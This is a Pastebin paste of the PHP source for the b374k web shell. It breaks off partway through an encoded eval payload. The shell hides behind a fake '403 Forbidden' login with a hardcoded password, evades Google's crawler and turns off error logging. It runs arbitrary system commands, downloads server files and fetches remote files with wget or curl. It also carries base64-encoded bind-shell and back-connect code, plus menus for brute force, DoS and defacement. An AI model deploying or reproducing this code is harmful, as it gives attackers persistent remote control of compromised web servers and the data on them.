djffhj

Untitled

May 7th, 2017
54
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 64.00 KB | None | 0 0
  1. <?php
  2. /*********************************************************************************************************/
  3. $auth_pass = "a61b1c3195845f12e1ba618cd9936fd9"; //password crypted with md5, default is 'Newbie3viLc063s'
  4. /*********************************************************************************************************/
  5. $color = "#00ff00";
  6. $default_action = 'FilesMan';
  7. @define('SELF_PATH', __FILE__);
  8.  
  9. /*********************************************************************************************************/
  10. # Avoid google's crawler
  11. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
  12. /*********************************************************************************************************/
  13.  
  14. @session_start();
  15. @error_reporting(0);
  16. @ini_set('error_log',NULL);
  17. @ini_set('log_errors',0);
  18. @ini_set('max_execution_time',0);
  19. @set_time_limit(0);
  20. @set_magic_quotes_runtime(0);
  21. @define('VERSION', 'v.2012');
  22. @define('TITLE', ':: b374k Newbie3viLc063s 2012 ::');
  23.  
  24. /*********************************************************************************************************/
  25.  
  26. if( get_magic_quotes_gpc() )
  27. {
  28. function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
  29. $_POST = stripslashes_array($_POST);
  30. }
  31.  
  32. function logout()
  33. {
  34. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  35. $page = $host='http://'.$_SERVER['SERVER_NAME'].'/'.$_SERVER['PHP_SELF'];
  36. echo '<center><span class="b1">The System Is Going To Down For LogOut Administrator Pages!!</scan></center>';
  37. ?>
  38. <script>window.location.href = '<?php print $page; ?>';</script>
  39. <?php
  40. exit(0);
  41. }
  42.  
  43. function printLogin()
  44. {
  45. ?>
  46. <html>
  47. <head>
  48. <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style>
  49. </head>
  50. <title>
  51. 403 Forbidden
  52. </title>
  53. <body>
  54. <h1>Forbidden</h1>
  55. <p>You don't have permission to access this file on this server <?=$_SERVER['HTTP_HOST']?>.</p>
  56. <hr>
  57. <form method=post>
  58. <address>Apache/2.2.8 at <?=$_SERVER['HTTP_HOST']?> Port 80<center><input type=password name=x><input type=submit value=''></center></address>
  59. </form>
  60. </body>
  61. </html>
  62. <?php
  63. exit;
  64. }
  65.  
  66. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  67. {
  68. if( empty( $auth_pass ) || ( isset( $_POST['x'] ) && ( md5($_POST['x']) == $auth_pass ) ) )
  69. { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }
  70. else
  71. { printLogin(); }
  72. }
  73.  
  74. if(isset($_GET['dl']) && ($_GET['dl'] != ""))
  75. {
  76. $file = $_GET['dl'];
  77. $filez = @file_get_contents($file);
  78. header("Content-type: application/octet-stream");
  79. header("Content-length: ".strlen($filez));
  80. header("Content-disposition: attachment;
  81. filename=\"".basename($file)."\";");
  82. echo $filez;
  83. exit;
  84. }
  85.  
  86. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
  87. {
  88. $file = $_GET['dlgzip'];
  89. $filez = gzencode(@file_get_contents($file));
  90. header("Content-Type:application/x-gzip\n");
  91. header("Content-length: ".strlen($filez));
  92. header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  93. echo $filez; exit;
  94. }
  95.  
  96. if(isset($_GET['img']))
  97. {
  98. @ob_clean();
  99. $d = magicboom($_GET['y']);
  100. $f = $_GET['img'];
  101. $inf = @getimagesize($d.$f);
  102. $ext = explode($f,".");
  103. $ext = $ext[count($ext)-1];
  104. @header("Content-type: ".$inf["mime"]);
  105. @header("Cache-control: public");
  106. @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  107. @header("Cache-control: max-age=".(60*60*24*7));
  108. @readfile($d.$f);
  109. exit;
  110. }
  111. $ver = VERSION;
  112. $software = getenv("SERVER_SOFTWARE");
  113.  
  114. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
  115. else $safemode = FALSE;
  116. $system = @php_uname();
  117.  
  118. if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
  119. else $win = FALSE;
  120.  
  121. if(isset($_GET['y']))
  122. { if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } }
  123.  
  124. if(!$win)
  125. { if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; }
  126. else
  127. {
  128. $user = @get_current_user();
  129. $id = $user;
  130. $prompt = $user." &gt;";
  131. $pwd = realpath(".")."\\";
  132. $v = explode("\\",$d);
  133. $v = $v[0];
  134. foreach (range("A","Z") as $letter)
  135. {
  136. $bool = @is_dir($letter.":\\");
  137. if ($bool)
  138. {
  139. $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
  140. if ($letter.":" != $v) {$letters .= $letter;}
  141. else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
  142. $letters .= " ]</a> ";
  143. }
  144. }
  145. }
  146.  
  147. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  148. else $posix = FALSE;
  149.  
  150. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  151. $my_ip = $_SERVER['REMOTE_ADDR'];
  152. $bindport = "55555";
  153. $bindport_pass = "Newbie3viLc063s";
  154. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
  155. $pwdurl = "";
  156. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
  157. {
  158. $pathz = "";
  159. for($j = 0 ; $j <= $i ; $j++)
  160. {
  161. $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  162. }
  163. $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  164. }
  165.  
  166. if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; }
  167. $buff = $software."<br />";
  168. $buff .= $system."<br />";
  169. if($id != "") $buff .= $id."<br />";
  170. $buff .= "server ip : ".$server_ip." <span class=\"gaya\">|</span> your ip : <span class=\"your_ip\">".$my_ip."</span><br />";
  171. if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />";
  172. else $buff .= "safemode <span class=\"gaya\">OFF<span><br />";
  173. $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl;
  174.  
  175. function rapih($text){ return trim(str_replace("<br />","",$text)); }
  176.  
  177. function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); }
  178.  
  179. function showdir($pwd,$prompt)
  180. {
  181. $fname = array();
  182. $dname = array();
  183. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  184. else $posix = FALSE;
  185. $user = "????:????";
  186. if($dh = opendir($pwd))
  187. {
  188. while($file = readdir($dh))
  189. {
  190. if(is_dir($file))
  191. { $dname[] = $file; }
  192. elseif(is_file($file))
  193. { $fname[] = $file; }
  194. }
  195. closedir($dh);
  196. }
  197. sort($fname);
  198. sort($dname);
  199. $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  200. $tree = @sizeof($path);
  201. $parent = "";
  202. $buff = "<form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  203. <table class=\"cmdbox\" style=\"width:50%;\">
  204. <tr>
  205. <td>CMD@$prompt</td>
  206. <td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" />
  207. <input class=\"inputzbut\" type=\"submit\" value=\"Execute !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  208. </tr>
  209. </form>
  210. <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  211. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  212. <tr>
  213. <td>view file/folder</td>
  214. <td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" />
  215. <input class=\"inputzbut\" type=\"submit\" value=\"Enter !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  216. </tr>
  217. </form>
  218. </table>
  219. <table class=\"explore\">
  220. <tr>
  221. <th>name</th>
  222. <th style=\"width:80px;\">size</th>
  223. <th style=\"width:210px;\">owner:group</th>
  224. <th style=\"width:80px;\">perms</th>
  225. <th style=\"width:110px;\">modified</th>
  226. <th style=\"width:190px;\">actions</th>
  227. </tr> ";
  228.  
  229. if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  230. else $parent = $pwd;
  231. foreach($dname as $folder)
  232. {
  233. if($folder == ".")
  234. {
  235. if(!$win && $posix)
  236. {
  237. $name=@posix_getpwuid(@fileowner($folder));
  238. $group=@posix_getgrgid(@filegroup($folder));
  239. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  240. }
  241. else { $owner = $user; }
  242. $buff .= "<tr>
  243. <td><a href=\"?y=".$pwd."\">$folder</a></td>
  244. <td>-</td>
  245. <td style=\"text-align:center;\">".$owner."</td>
  246. <td>".get_perms($pwd)."</td>
  247. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td>
  248. <td><span id=\"titik1\">
  249. <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a>
  250. | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
  251. </span>
  252. <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  253. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  254. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  255. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  256. </form>
  257. </td>
  258. </tr> ";
  259. }
  260. elseif($folder == "..")
  261. {
  262. if(!$win && $posix)
  263. {
  264. $name=@posix_getpwuid(@fileowner($folder));
  265. $group=@posix_getgrgid(@filegroup($folder));
  266. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  267. }
  268. else { $owner = $user; }
  269. $buff .= "<tr>
  270. <td><a href=\"?y=".$parent."\">$folder</a></td>
  271. <td>-</td>
  272. <td style=\"text-align:center;\">".$owner."</td>
  273. <td>".get_perms($parent)."</td>
  274. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  275. <td><span id=\"titik2\">
  276. <a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a>
  277. | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a>
  278. </span>
  279. <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  280. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  281. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  282. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  283. </form>
  284. </td>
  285. </tr>";
  286. }
  287. else
  288. {
  289. if(!$win && $posix)
  290. {
  291. $name=@posix_getpwuid(@fileowner($folder));
  292. $group=@posix_getgrgid(@filegroup($folder));
  293. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  294. }
  295. else { $owner = $user; }
  296. $buff .= "<tr>
  297. <td>
  298. <a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a>
  299. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  300. <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  301. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  302. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  303. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  304. onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  305. </form>
  306. </td>
  307. <td>DIR</td>
  308. <td style=\"text-align:center;\">".$owner."</td>
  309. <td>".get_perms($pwd.$folder)."</td>
  310. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
  311. <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>
  312. | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a>
  313. </td>
  314. </tr>";
  315. }
  316. }
  317. foreach($fname as $file)
  318. {
  319. $full = $pwd.$file;
  320. if(!$win && $posix)
  321. {
  322. $name=@posix_getpwuid(@fileowner($file));
  323. $group=@posix_getgrgid(@filegroup($file));
  324. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  325. }
  326. else { $owner = $user; }
  327. $buff .= "<tr>
  328. <td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\">$file</a>
  329. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  330. <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  331. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  332. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  333. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  334. onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  335. </form> </td>
  336. <td>".ukuran($full)."</td>
  337. <td style=\"text-align:center;\">".$owner."</td>
  338. <td>".get_perms($full)."</td>
  339. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  340. <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a>
  341. | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>
  342. | <a href=\"?y=$pwd&amp;delete=$full\">delete</a>
  343. | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gz</a>)
  344. </td>
  345. </tr>";
  346. }
  347. $buff .= "</table>"; return $buff;
  348. }
  349.  
  350. function ukuran($file)
  351. {
  352. if($size = @filesize($file))
  353. {
  354. if($size <= 1024) return $size;
  355. else
  356. {
  357. if($size <= 1024*1024)
  358. { $size = @round($size / 1024,2);; return "$size kb"; }
  359. else { $size = @round($size / 1024 / 1024,2); return "$size mb"; }
  360. }
  361. }
  362. else return "???";
  363. }
  364.  
  365. function exe($cmd)
  366. {
  367. if(function_exists('system'))
  368. {
  369. @ob_start();
  370. @system($cmd);
  371. $buff = @ob_get_contents();
  372. @ob_end_clean();
  373. return $buff;
  374. }
  375. elseif(function_exists('exec'))
  376. {
  377. @exec($cmd,$results);
  378. $buff = "";
  379. foreach($results as $result)
  380. { $buff .= $result; }
  381. return $buff;
  382. }
  383. elseif(function_exists('passthru'))
  384. {
  385. @ob_start();
  386. @passthru($cmd);
  387. $buff = @ob_get_contents();
  388. @ob_end_clean();
  389. return $buff;
  390. }
  391. elseif(function_exists('shell_exec'))
  392. {
  393. $buff = @shell_exec($cmd);
  394. return $buff;
  395. }
  396. }
  397.  
  398. function tulis($file,$text)
  399. {
  400. $textz = gzinflate(base64_decode($text));
  401. if($filez = @fopen($file,"w"))
  402. {
  403. @fputs($filez,$textz);
  404. @fclose($file);
  405. }
  406. }
  407.  
  408. function ambil($link,$file)
  409. {
  410. if($fp = @fopen($link,"r"))
  411. {
  412. while(!feof($fp))
  413. {
  414. $cont.= @fread($fp,1024);
  415. }
  416. @fclose($fp);
  417. $fp2 = @fopen($file,"w");
  418. @fwrite($fp2,$cont);
  419. @fclose($fp2);
  420. }
  421. }
  422.  
  423. function which($pr)
  424. {
  425. $path = exe("which $pr");
  426. if(!empty($path))
  427. { return trim($path); }
  428. else { return trim($pr); }
  429. }
  430.  
  431. function download($cmd,$url)
  432. {
  433. $namafile = basename($url);
  434. switch($cmd)
  435. {
  436. case 'wwget': exe(which('wget')." ".$url." -O ".$namafile); break;
  437. case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile); break;
  438. case 'wfread' : ambil($wurl,$namafile);break;
  439. case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
  440. case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
  441. case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
  442. case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
  443. default: break; }
  444. return $namafile;
  445. }
  446.  
  447. function get_perms($file)
  448. {
  449. if($mode=@fileperms($file))
  450. {
  451. $perms='';
  452. $perms .= ($mode & 00400) ? 'r' : '-';
  453. $perms .= ($mode & 00200) ? 'w' : '-';
  454. $perms .= ($mode & 00100) ? 'x' : '-';
  455. $perms .= ($mode & 00040) ? 'r' : '-';
  456. $perms .= ($mode & 00020) ? 'w' : '-';
  457. $perms .= ($mode & 00010) ? 'x' : '-';
  458. $perms .= ($mode & 00004) ? 'r' : '-';
  459. $perms .= ($mode & 00002) ? 'w' : '-';
  460. $perms .= ($mode & 00001) ? 'x' : '-';
  461. return $perms;
  462. }
  463. else return "??????????";
  464. }
  465.  
  466. function clearspace($text){ return str_replace(" ","_",$text); }
  467.  
  468. $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  469. $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  470.  
  471. $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  472. ?>
  473.  
  474. <html>
  475. <head>
  476. <title><?php print TITLE; ?> <?php echo VERSION; ?></title>
  477. <script type="text/javascript">
  478.  
  479. function tukar(lama,baru)
  480. {
  481. document.getElementById(lama).style.display = 'none';
  482. document.getElementById(baru).style.display = 'block';
  483. }
  484.  
  485. </script>
  486. <style type="text/css">
  487. AKUSTYLE { display:none; }
  488. body { background:#000000;; }
  489. a { text-decoration:none; }
  490. a:hover { border-bottom:1px solid #4C83AF; }
  491. * { font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; }
  492. #menu { background:#111111; margin:2px 2px 2px 2px; }
  493. #menu a { padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; }
  494. #menu a:hover { background:#66CCFF; border-bottom:1px solid #333333; border-top:1px solid #333333; }
  495. .tabnet { margin:15px auto 0 auto; border: 1px solid #333333; }
  496. .main { width:100%; }
  497. .gaya { color: #4C83AF; }
  498. .your_ip { color: #FF4719; }
  499. .inputz { background:#001A66; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; }
  500. .inputzbut { background:#111111; color:#666666; margin:0 4px; border:1px solid #444444; }
  501. .inputz:hover,
  502. .inputzbut:hover { border-bottom:1px solid #66CCFF; border-top:1px solid #66CCFF; color:#66CCFF; }
  503. .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; }
  504. .cmdbox { width:100%; }
  505. .head_info { padding: 0 4px; }
  506. .b1 { font-size:30px; padding:0; color:#FF0000; }
  507. .b2 { font-size:30px; padding:0; color: #FF9966; }
  508. .b_tbl { text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; }
  509. .phpinfo table { width:100%; padding:0 0 0 0; }
  510. .phpinfo td { background:#111111; color:#cccccc; padding:6px 8px;; }
  511. .phpinfo th, th { background:#191919; border-bottom:1px solid #333333; font-weight:normal; }
  512. .phpinfo h2,
  513. .phpinfo h2 a { text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
  514. .explore { width:100%; }
  515. .explore a { text-decoration:none; }
  516. .explore td { border-bottom:1px solid #333333; padding:0 8px; line-height:24px; }
  517. .explore th { padding:3px 8px; font-weight:normal; }
  518. .explore th:hover,
  519. .phpinfo th:hover { border-bottom:1px solid #4C83AF; }
  520. .explore tr:hover { background:#111111; }
  521. .viewfile { background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; }
  522. .sembunyi { display:none; padding:0;margin:0; }
  523. </style>
  524. </head>
  525. <body onLoad="document.getElementById('cmd').focus();">
  526. <div class="main">
  527. <!-- head info start here -->
  528. <div class="head_info">
  529. <table>
  530. <tr>
  531. <td>
  532. <table class="b_tbl">
  533. <tr>
  534. <td>
  535. <a href="?">
  536. <span class="b1">b<span class="b2">3<span class="b1">7</span>4</span>k</span>
  537. </a>
  538. </td>
  539. </tr>
  540. <tr>
  541. <td>m1n1 Newbie3viLc063s <?php echo $ver; ?></td>
  542. </tr>
  543. </table>
  544. </td>
  545. <td>
  546. <?php echo $buff; ?>
  547. </td>
  548. </tr>
  549. </table>
  550. </div>
  551. <!-- head info end here -->
  552. <!-- menu start -->
  553. <div id="menu">
  554. <a href="?<?php echo "y=".$pwd; ?>"> <b>Explore</b></a>
  555. <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell"> <b>Shell</b></a>
  556. <a href="?<?php echo "y=".$pwd; ?>&amp;x=php"> <b>Eval</b></a>
  557. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql"> <b>MySQL</b></a>
  558. <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo"> <b>PHP</b></a>
  559. <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit"> <b>NetSploit</b></a>
  560. <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload"> <b>Upload</b></a>
  561. <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail"> <b>Mail</b></a>
  562. <a href="?<?php echo "y=".$pwd; ?>&amp;x=brute"> <b>BruteForce</b></a>
  563. <a href="?<?php echo "y=".$pwd; ?>&amp;x=readable"> <b>OpenDIR</b></a>
  564. <a href="?<?php echo "y=".$pwd; ?>&amp;x=dos"> <b>D0S</b></a>
  565. <a href="?<?php echo "y=".$pwd; ?>&amp;x=localdomain"> <b>LocalDomain</b></a>
  566. <a href="?<?php echo "y=".$pwd; ?>&amp;x=zone-h"> <b>Zone-H</b></a>
  567. <a href="?x=out"> <b>Log-Out</b></a>
  568. </div>
  569. <!-- menu end -->
  570.  
  571. <?php
  572. if(isset($_GET['x']) && ($_GET['x'] == 'out')) { logout(); }
  573. elseif(isset($_GET['x']) && ($_GET['x'] == 'php'))
  574. {
  575. ?>
  576. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  577. <table class="cmdbox">
  578. <tr>
  579. <td>
  580. <textarea class="output" name="cmd" id="cmd"><? eval(gzinflate(base64_decode('FZfHsoPYFUV/xbNuFwNyKtvdRc45M3GRcxBJwNdb1uhVSUg87jl7r/X3X//++x/VlY1/Nm8312N2VH/ux/bfbTlg9M882ysC+29ZFUtZ/fmHmK4BT9ofMfHBEJlwwTkO96MWUH6tGWu739qt6hmlcqsQ2Y2G3v1L7RcIkCgIgKO7rxdc0+VpeSp44iGYXxfezdGQgN6RHLjOgMMnAIIqqEFYioIZr4DXjZu6kaVHzEh6rSxLqDcP8gixjF0msxYFYk9pZV6ZVTDcgS0sOhSjcRQhBHR/qkohI/0BwdokHYPIufFv0JZqLlJGPpZqwzDbMZ+Y3I8slQK8OclaE1hv6yh2DoE8tPn2kxJw7jAvDNtFgKPA5/5cx0SMRHsIp7Ai2FBXsFLQ9A3rW5LNOMQk2lPU+DpmM6XIJPOcEvWshHvX9WNb7mMdafviD2JBvNMJw5pwk2Xt/lfCMNJHjuDGH/l0ElWirAoLr9wMnrqf95z2lCOXgn6F0CT2/fvAt9ujZKgXDpla9JqbBoJ47vh4K/82PlC/EvTq2Bf2kO8smhaXzxs2yzwPJKI/QBabEoKyrL/3nJrXdNR/WErpv8V9AJr9mLtLELthbznczWg8XhUG88/qQ1HofQz2xWrFN26qbKrYNh2T+BK7qo5Z19wIH9sTY1I5jhbuJfaZGXUiyKKhUwyaus1xUFlZBpetenLKMRQcnfc8z9vKM4hpxuKYc3ci7nCIW9fpobdQJMNGx+rysJfniz3qlfghUTgtPOBISldYNtDzN8BnFtXS4E1Olv79ynmCKPl010HE+JwYi7nvE03Qo3Mt/KaWY1bUdgtMjUpgycdXC8prQ/pjkqhApIKjypJ4NTPdrFVNAtf27JwnFJUPuQHOaP1mFNge1g2oiEmyxGe1BEMxZTypful5XeGoYmKB5QtJE+aOZcSlfM3VCHhOvfd+2HGdUoDFM9Zypu1GiOw1R68CtEvzUVIp4KKCR3Vof8y+S1ZXxVY/FnFmpbTg1PoOPIazSyvZ30FkDg+DvEgwa7O3tB5PNDxeipzuw2jFJchbTIa4Hs6bXfvjlYZhoTstMkb1uRsz58WWMWjRFyIcmRsT4KxKCG0QYEXFkCYqGmpcJ3wG+z4Yy9kYVg+VyzIjsvI3CnQ2mJVQPGEYC/Cy3vFjRAoID4XuWvyUY6l8fbB1S9eKDdXOUBJtAvySHDg2aZI6Z/4MkVXTt20UqnALPgwPq7z3FRl5d2+doBimSEVD5dAduiqpJIvv1SSSTxzmgtUJiRiHMD2FJJv0J7lF5bmIqNmS33EuA6IH+xDMECpfmf49vKN9VWmdXSvkXYTwH10hozClHHPnon1CAem89NE4aEv6muTv5yU6njOkwumrbUwIQ5NJTOVfVARUjmB5OsNH5w3e6O2V94G4yYcDR5dyvleoPKb6rYPsER22ZvhITyPG/SjWx9aZIBJAjMBsuyRCYH1YXEX7DC0Y/GR4QGzKhY8CqFPbWFgNIvJWQq/UufLtwnlu/C/FcgCRcxX5QjVXmwwyl1pnPZk0NXgOc+hIltExRW